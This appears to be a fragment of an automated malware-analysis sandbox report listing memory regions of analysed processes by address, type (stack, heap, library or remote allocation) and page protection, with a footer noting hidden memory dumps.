||
|
F7750FF000
|
stack
|
page read and write
|
||
|
25282EB0000
|
heap
|
page read and write
|
||
|
166DDD90000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
7FFFE21E0000
|
unkown
|
page readonly
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD89B000
|
heap
|
page read and write
|
||
|
209F5A64000
|
heap
|
page read and write
|
||
|
7FFF7F260000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F0F6000
|
trusted library allocation
|
page read and write
|
||
|
FB8118B000
|
stack
|
page read and write
|
||
|
27DF000
|
stack
|
page read and write
|
||
|
FB81C7F000
|
stack
|
page read and write
|
||
|
2E1B7E3D000
|
heap
|
page read and write
|
||
|
20E43213000
|
heap
|
page read and write
|
||
|
166F7F30000
|
heap
|
page read and write
|
||
|
3C0000
|
remote allocation
|
page read and write
|
||
|
F774FFE000
|
stack
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
7DF4B1190000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF4B25A000
|
heap
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
25126713000
|
heap
|
page read and write
|
||
|
DBFF2FB000
|
stack
|
page read and write
|
||
|
2B983F84000
|
heap
|
page read and write
|
||
|
2E1BD610000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B25C000
|
heap
|
page read and write
|
||
|
28DB000
|
stack
|
page read and write
|
||
|
2E1BD548000
|
trusted library allocation
|
page read and write
|
||
|
166EFBF0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B26A000
|
heap
|
page read and write
|
||
|
217E4C02000
|
trusted library allocation
|
page read and write
|
||
|
166E07EC000
|
trusted library allocation
|
page read and write
|
||
|
166DF720000
|
trusted library allocation
|
page read and write
|
||
|
166E0845000
|
trusted library allocation
|
page read and write
|
||
|
2E1B9393000
|
trusted library allocation
|
page read and write
|
||
|
1EC0000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F500000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
2E1BD690000
|
trusted library allocation
|
page read and write
|
||
|
25126708000
|
heap
|
page read and write
|
||
|
166F7BE0000
|
heap
|
page read and write
|
||
|
2A5A000
|
heap
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
209F5A02000
|
heap
|
page read and write
|
||
|
25126570000
|
heap
|
page read and write
|
||
|
7FFF7F270000
|
trusted library allocation
|
page read and write
|
||
|
166F8100000
|
trusted library allocation
|
page read and write
|
||
|
166DDC69000
|
heap
|
page read and write
|
||
|
7FFF7F200000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7EE0000
|
heap
|
page read and write
|
||
|
1FF4B257000
|
heap
|
page read and write
|
||
|
217E4300000
|
heap
|
page read and write
|
||
|
25282EED000
|
heap
|
page read and write
|
||
|
2B983471000
|
heap
|
page read and write
|
||
|
20E43287000
|
heap
|
page read and write
|
||
|
BA85F77000
|
stack
|
page read and write
|
||
|
251265A0000
|
trusted library allocation
|
page read and write
|
||
|
29D6000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166DDD38000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7E90000
|
trusted library allocation
|
page read and write
|
||
|
17836FF000
|
stack
|
page read and write
|
||
|
DBFFC7F000
|
stack
|
page read and write
|
||
|
DBFF977000
|
stack
|
page read and write
|
||
|
2E1B7E8B000
|
heap
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
58F627E000
|
stack
|
page read and write
|
||
|
166F7F13000
|
heap
|
page read and write
|
||
|
28287013000
|
heap
|
page read and write
|
||
|
209F5A55000
|
heap
|
page read and write
|
||
|
2CB7F2D0000
|
heap
|
page read and write
|
||
|
7FFFE220F000
|
unkown
|
page readonly
|
||
|
217E4302000
|
heap
|
page read and write
|
||
|
7FFF7EF63000
|
trusted library allocation
|
page read and write
|
||
|
17432FF0000
|
remote allocation
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
BA857DC000
|
stack
|
page read and write
|
||
|
166DDCBD000
|
heap
|
page read and write
|
||
|
2E1B7E26000
|
heap
|
page read and write
|
||
|
209F6202000
|
trusted library allocation
|
page read and write
|
||
|
2B983429000
|
heap
|
page read and write
|
||
|
166DFBC0000
|
trusted library allocation
|
page read and write
|
||
|
2B983F7C000
|
heap
|
page read and write
|
||
|
17433051000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2B983F86000
|
heap
|
page read and write
|
||
|
25282D90000
|
heap
|
page read and write
|
||
|
2E1B7E6D000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
25126652000
|
heap
|
page read and write
|
||
|
2B983502000
|
heap
|
page read and write
|
||
|
234E000
|
stack
|
page read and write
|
||
|
2E1B7D30000
|
heap
|
page read and write
|
||
|
25282ED1000
|
heap
|
page read and write
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B24D000
|
heap
|
page read and write
|
||
|
DB4737F000
|
stack
|
page read and write
|
||
|
7FFF7EF53000
|
trusted library allocation
|
page execute and read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
24EB000
|
stack
|
page read and write
|
||
|
217E4202000
|
heap
|
page read and write
|
||
|
1FF4B26E000
|
heap
|
page read and write
|
||
|
7FFF7F006000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
20E43190000
|
heap
|
page read and write
|
||
|
7FFFE21E0000
|
unkown
|
page readonly
|
||
|
2E1BD3B0000
|
trusted library allocation
|
page read and write
|
||
|
28287113000
|
heap
|
page read and write
|
||
|
166F7D00000
|
trusted library allocation
|
page read and write
|
||
|
166F7E90000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F1E7000
|
trusted library allocation
|
page read and write
|
||
|
217E4257000
|
heap
|
page read and write
|
||
|
2B983FA9000
|
heap
|
page read and write
|
||
|
FB81B7F000
|
stack
|
page read and write
|
||
|
26DC000
|
stack
|
page read and write
|
||
|
39A000
|
stack
|
page read and write
|
||
|
2B983F84000
|
heap
|
page read and write
|
||
|
2E1B7DA0000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD680000
|
trusted library allocation
|
page read and write
|
||
|
166DFC49000
|
trusted library allocation
|
page read and write
|
There are 924 hidden memdumps, click here to show them.